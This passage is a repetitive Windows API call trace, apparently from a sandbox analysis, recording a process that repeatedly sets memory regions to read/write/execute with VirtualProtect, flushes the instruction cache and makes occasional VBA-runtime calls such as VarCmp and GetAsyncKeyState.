(hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.234] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.234] GetCurrentProcess () returned 0xffffffff [0114.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.234] GetCurrentProcess () returned 0xffffffff [0114.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.235] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.235] GetCurrentProcess () returned 0xffffffff [0114.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.235] GetCurrentProcess () returned 0xffffffff [0114.235] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.235] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.236] GetCurrentProcess () returned 0xffffffff [0114.236] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.236] GetCurrentProcess () returned 0xffffffff [0114.236] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.236] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.237] GetCurrentProcess () returned 0xffffffff [0114.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.237] GetCurrentProcess () returned 0xffffffff [0114.237] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.237] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.238] GetCurrentProcess () returned 0xffffffff [0114.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.238] GetCurrentProcess () returned 0xffffffff [0114.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.238] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.238] GetCurrentProcess () returned 0xffffffff [0114.238] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.238] GetCurrentProcess () returned 0xffffffff [0114.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.239] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.240] GetCurrentProcess () returned 0xffffffff [0114.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.256] GetAsyncKeyState (vKey=3) returned 0 [0114.256] CRetailMalloc_Alloc () returned 0xcb766b8 [0114.256] memcpy (in: _Dst=0xb754f48, _Src=0x1977bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.257] memcpy (in: _Dst=0xcb766d8, _Src=0x197824, _Size=0x18 | out: _Dst=0xcb766d8) returned 0xcb766d8 [0114.257] CRetailMalloc_Realloc () returned 0xcb766b8 [0114.257] CRetailMalloc_Free () returned 0x1 [0114.257] GetCurrentProcess () returned 0xffffffff [0114.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.257] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.258] GetCurrentProcess () returned 0xffffffff [0114.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.258] GetCurrentProcess () returned 0xffffffff [0114.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.258] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.258] GetCurrentProcess () returned 0xffffffff [0114.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.258] GetCurrentProcess () returned 0xffffffff [0114.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.258] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.259] GetCurrentProcess () returned 0xffffffff [0114.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.259] GetCurrentProcess () returned 0xffffffff [0114.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.259] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.259] GetCurrentProcess () returned 0xffffffff [0114.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.259] GetCurrentProcess () returned 0xffffffff [0114.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.259] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.260] GetCurrentProcess () returned 0xffffffff [0114.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.260] GetCurrentProcess () returned 0xffffffff [0114.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.260] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.260] GetCurrentProcess () returned 0xffffffff [0114.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.260] GetCurrentProcess () returned 0xffffffff [0114.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.260] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.261] GetCurrentProcess () returned 0xffffffff [0114.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.261] GetCurrentProcess () returned 0xffffffff [0114.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.261] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.261] GetCurrentProcess () returned 0xffffffff [0114.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.261] GetCurrentProcess () returned 0xffffffff [0114.261] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.261] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.262] GetCurrentProcess () returned 0xffffffff [0114.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.262] GetCurrentProcess () returned 0xffffffff [0114.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.262] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.262] GetCurrentProcess () returned 0xffffffff [0114.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.262] GetCurrentProcess () returned 0xffffffff [0114.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.262] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.263] GetCurrentProcess () returned 0xffffffff [0114.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.263] GetCurrentProcess () returned 0xffffffff [0114.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.263] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.263] GetCurrentProcess () returned 0xffffffff [0114.263] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.263] GetCurrentProcess () returned 0xffffffff [0114.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.264] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.264] GetCurrentProcess () returned 0xffffffff [0114.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.264] GetCurrentProcess () returned 0xffffffff [0114.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.264] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.264] GetCurrentProcess () returned 0xffffffff [0114.264] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.265] GetCurrentProcess () returned 0xffffffff [0114.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.265] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.265] GetCurrentProcess () returned 0xffffffff [0114.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.265] GetCurrentProcess () returned 0xffffffff [0114.265] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.265] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.266] GetCurrentProcess () returned 0xffffffff [0114.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.266] GetCurrentProcess () returned 0xffffffff [0114.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.266] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.266] GetCurrentProcess () returned 0xffffffff [0114.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.266] GetCurrentProcess () returned 0xffffffff [0114.266] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.266] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.267] GetCurrentProcess () returned 0xffffffff [0114.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.267] GetCurrentProcess () returned 0xffffffff [0114.267] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.267] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.268] GetCurrentProcess () returned 0xffffffff [0114.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.268] GetCurrentProcess () returned 0xffffffff [0114.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.268] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.268] GetCurrentProcess () returned 0xffffffff [0114.268] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.271] GetCurrentProcess () returned 0xffffffff [0114.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.271] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.272] GetCurrentProcess () returned 0xffffffff [0114.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.272] GetCurrentProcess () returned 0xffffffff [0114.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.272] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.272] GetCurrentProcess () returned 0xffffffff [0114.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.272] GetCurrentProcess () returned 0xffffffff [0114.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.272] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.273] GetCurrentProcess () returned 0xffffffff [0114.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.273] GetCurrentProcess () returned 0xffffffff [0114.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.273] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.273] GetCurrentProcess () returned 0xffffffff [0114.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.273] GetCurrentProcess () returned 0xffffffff [0114.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.273] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.274] GetCurrentProcess () returned 0xffffffff [0114.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.274] GetCurrentProcess () returned 0xffffffff [0114.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.274] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.274] GetCurrentProcess () returned 0xffffffff [0114.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.274] GetCurrentProcess () returned 0xffffffff [0114.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.274] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.275] GetCurrentProcess () returned 0xffffffff [0114.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.275] GetCurrentProcess () returned 0xffffffff [0114.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.275] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.275] GetCurrentProcess () returned 0xffffffff [0114.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.275] GetCurrentProcess () returned 0xffffffff [0114.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.275] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.276] GetCurrentProcess () returned 0xffffffff [0114.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.276] GetCurrentProcess () returned 0xffffffff [0114.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.276] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.276] GetCurrentProcess () returned 0xffffffff [0114.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.276] GetCurrentProcess () returned 0xffffffff [0114.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.276] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974cc | out: lpflOldProtect=0x1974cc*=0x40) returned 1 [0114.277] GetCurrentProcess () returned 0xffffffff [0114.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.278] GetAsyncKeyState (vKey=3) returned 0 [0114.278] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.278] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.278] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.278] CRetailMalloc_Alloc () returned 0xcb76718 [0114.278] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.278] memcpy (in: _Dst=0xcb76738, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb76738) returned 0xcb76738 [0114.278] CRetailMalloc_Realloc () returned 0xcb76718 [0114.278] CRetailMalloc_Free () returned 0x1 [0114.278] GetCurrentProcess () returned 0xffffffff [0114.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.278] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.279] GetCurrentProcess () returned 0xffffffff [0114.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.279] GetCurrentProcess () returned 0xffffffff [0114.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.279] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.280] GetCurrentProcess () returned 0xffffffff [0114.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.280] GetCurrentProcess () returned 0xffffffff [0114.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.280] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.280] GetCurrentProcess () returned 0xffffffff [0114.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.280] GetCurrentProcess () returned 0xffffffff [0114.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.280] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.281] GetCurrentProcess () returned 0xffffffff [0114.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.281] GetCurrentProcess () returned 0xffffffff [0114.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.281] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.281] GetCurrentProcess () returned 0xffffffff [0114.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.281] GetCurrentProcess () returned 0xffffffff [0114.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.282] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.282] GetCurrentProcess () returned 0xffffffff [0114.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.282] GetCurrentProcess () returned 0xffffffff [0114.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.282] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.283] GetCurrentProcess () returned 0xffffffff [0114.283] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.283] GetCurrentProcess () returned 0xffffffff [0114.283] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.283] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.283] GetCurrentProcess () returned 0xffffffff [0114.283] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.283] GetCurrentProcess () returned 0xffffffff [0114.283] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.283] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.284] GetCurrentProcess () returned 0xffffffff [0114.284] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.288] GetCurrentProcess () returned 0xffffffff [0114.288] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.288] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.288] GetCurrentProcess () returned 0xffffffff [0114.288] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.288] GetCurrentProcess () returned 0xffffffff [0114.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.289] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.289] GetCurrentProcess () returned 0xffffffff [0114.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.289] GetCurrentProcess () returned 0xffffffff [0114.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.289] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.289] GetCurrentProcess () returned 0xffffffff [0114.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.290] GetCurrentProcess () returned 0xffffffff [0114.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.290] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.290] GetCurrentProcess () returned 0xffffffff [0114.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.290] GetCurrentProcess () returned 0xffffffff [0114.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.290] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.291] GetCurrentProcess () returned 0xffffffff [0114.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.291] GetCurrentProcess () returned 0xffffffff [0114.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.291] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.291] GetCurrentProcess () returned 0xffffffff [0114.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.291] GetCurrentProcess () returned 0xffffffff [0114.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.291] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.292] GetCurrentProcess () returned 0xffffffff [0114.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.292] GetCurrentProcess () returned 0xffffffff [0114.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.292] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.292] GetCurrentProcess () returned 0xffffffff [0114.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.292] GetCurrentProcess () returned 0xffffffff [0114.292] FlushInstructionCache 